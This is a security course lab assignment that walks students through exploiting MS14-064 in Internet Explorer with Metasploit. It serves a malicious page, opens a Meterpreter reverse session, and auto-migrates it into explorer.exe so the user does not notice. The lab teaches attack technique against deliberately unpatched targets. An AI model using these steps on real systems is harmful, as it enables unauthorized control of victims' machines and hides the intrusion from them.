Project 14: Attacking Internet Explorer and Migrating (10 pts.)

What You Need

A Kali Linux machine to serve as an attacker
A Windows 2008 Server machine without patches to serve as the target

Task 1: Using the MS14-064 Attack (5 pts.)

In a Web browser, go to:

http://www.rapid7.com/db/modules/exploit/windows/browser/ms14_064_ole_code_execution

Read about this attack. It's amazing--it uses a vulnerability that's been in Internet Explorer since IE 3 on Windows 95. The Metasploit module only claims to work on Windows XP and 7, but since it uses PowerShell, and PowerShell is included in Windows Server 2008, it works there too.

Testing Networking

Start both your Kali and Windows 2008 server machines. On your Kali machine, execute the ifconfig command to find your IP address.

On your Windows machine, ping the Kali machine. If you don't get replies, you need to troubleshoot your networking before proceeding.

Freeing Port 80

We plan to start a malicious server on port 80, so we need to make sure there's nothing already listening on that port.

On your Kali attacker, execute this command:

netstat -pant

If there's no process listening on port 80, you don't need to do anything. If port 80 is listening, you'll see what process is listening. In the image below, apache2 is listening on port 80.

If you need to stop apache, do that with this command:

service apache2 stop

You could also use the kill command to kill the process by its Process ID number.

Starting a Malicious Web Server

On your Kali attacker, execute these commands:

msfconsole use exploit/windows/browser/ms14_064_ole_code_execution
show options

As shown below, all the options have sensible defaults--none of them require adjustment. However, let's set the URIPATH and SRVPORT, just to make the typing easier, and to label the screen show with your name.

On your Kali attacker, execute these commands, replacing "YOURNAME" with your own name, without spaces:

set SRVPORT 80 set URIPATH YOURNAME
exploit

Both the reverse handler and the Web server start, as shown below. Note the URL outlined in green in the image below.

Opening the Malicious Web Page on the Target

On your Windows 2008 target machine, open Internet Explorer and open the URL shown by Metasploit on your Kali machine, which contains your name.

If the page won't load, try refreshing it a couple times, or removing the :80 from the URL--that worked for me, as shown below.

When the page loads, an "Information Bar" pop-up box will appear, as shown below. In that box, click the Close button.

On your Kali machine, you should see a "Meterpreter session opened" message, as shown below.

To see the "meterpreter>" prompt, execute this command:

sessions -i 1

Saving the Screen Image

Make sure the "Meterpreter session opened" message is visible, as shown above.

Save a whole-desktop screen capture with a filename of "Proj 14a from YOUR NAME".

Task 2: Automatic Migration with a Script (5 pts.)

Learning About the Migrate Script

On your Kali attacker, at the "meterpreter>" prompt, execute this command:

run migrate

You see the basic functionality of the script, as shown below.

Closing Internet Explorer

Look at your Windows 2008 Server desktop. Internet Explorer is frozen, with a blank page. The user won't tolerate that for long--within a few seconds, the user will probably close Internet Explorer. For several common Metasploit modules, that breaks the meterpreter session.

On your Windows 2008 Server desktop, close Internet Explorer.

Understanding the Meterpreter Process

On your Kali server, at the "meterpreter>" prompt, press Enter.

The Meterpreter seesion is still working! To see why, at the "meterpreter>" prompt, execute this command:

getpid

You see the process ID of the process Metasploit is using on the target machine, as shown below. Your PID will be different from mine.

To see what this process is, on your Windows 2008 Server desktop, at the bottom of the screen, right-click the teskbar and click "Task Manager", as shown below.

In Task Manager, click View, "Select Columns...". In the Select Process Page Columns box, check "PID (Process Identifier)", as shown below.

Click OK.

In Task Manager, expand the width of the new column so you can see the PID header.

Click the PID header to sort by PID and find the PID you saw in meterpreter.

This particular exploit does not work by injecting code into the running iexplore.exe process. It starts a new "ApacheBench Command Line" process with a name composed of random letters, as shown below.

Closing the ApacheBench Process

In Task Manager, click the ApacheBench process to select it, as shown above. At the lower right, click the "End Process" button.

A box pops up asking "Do you want to end this process?" Click the "End process" button.

On your Kali machine, the meterpreter session dies, as shown below.

Killing the Malicious Web Server Job

We need to stop the currently running Web server so we can change the malware it hands out.

On your Kali attacker, press enter to see a normal metasploit prompt.

Execute this command:

jobs

You see one job running, with Id=0, as shown below.

To kill the job, execute this command:

kill 0

Automatic Migration

We want to automatically migrate the session to a normal process, so the user won't notice anything unusual in Task Manager.

On your Kali attacker, in Metasploit, execute this command:

show advanced

Scroll back up to the "Payload advanced options" section.

One of the options is "AutoRunScript", as shown below.

On your Kali attacker, in Metasploit, execute these commands:

set AutoRunScript migrate -n explorer.exe
exploit

On your Windows 2008 Server machine, open Internet Explorer. Open the URL specified by Metsploit, and close the "Information Bar" box.

A session opens, the migrate script runs, and the session automatically migrates to another process, as shown below.

Saving the Screen Image

Make sure the "processing AutoRunScript 'migrate -n explorer.exe'" message is visible, as shown above.

Save a whole-desktop screen capture with a filename of "Proj 14b from YOUR NAME".

Viewing the Process on the Target Machine

On the Windows 2008 Server machine, close Internet Explorer. At the bottom of the screen, right-click the teskbar and click "Task Manager".

In Task Manager, find the PID you saw in meterpreter. That process is "explorer.exe", as shown below.

This is a good process to use, because it won't be closed until the user logs off.

Turning In Your Project

Email the image to cnit.124@gmail.com with a subject of "Project 14 from YOUR NAME".

Posted 10-28-15 by Sam Bowne
sessions command added 4-21-19